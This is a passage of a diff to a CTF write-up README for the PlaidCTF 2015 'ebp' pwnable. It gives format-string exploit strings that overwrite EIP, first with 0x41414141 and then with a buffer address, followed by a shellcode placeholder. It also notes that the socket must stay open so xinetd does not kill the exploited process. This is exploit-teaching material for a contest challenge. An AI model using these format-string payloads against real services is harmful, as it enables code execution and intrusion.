smokeleeteveryday/CTF_WRITEUPS/2015/PCTF/pwnable/ebp/README.md

 >AAAA%44840317x%44840317x%44840318x%n

 To overwrite EIP with 0x41414141.
-Now for the final part we need to put our shellcode in our buffer and overwrite EIP with the address of our shellcode:

->eip_overwrite = (0x0804A080 + n)
->where n is the length of the FMS exploit (36 bytes)
->so eip_overwrite = 0x0804A0A4
+Now for the final part we need to put our shellcode in our buffer and overwrite EIP with the address of our shellcode. eip_overwrite = (0x0804A080 + n) where n is the length of the FMS exploit (36 bytes) so eip_overwrite = 0x0804A0A4 giving the fms exploit: \xA4\xA0\x04\x08%44840317x%44840317x%44840318x%n<shellcode>
->fms exploit: \xA4\xA0\x04\x08%44840317x%44840317x%44840318x%n<shellcode>

 Note that we will need to keep our original socket open in order to prevent xinetd (which is running the challenge) from killing the exploited process.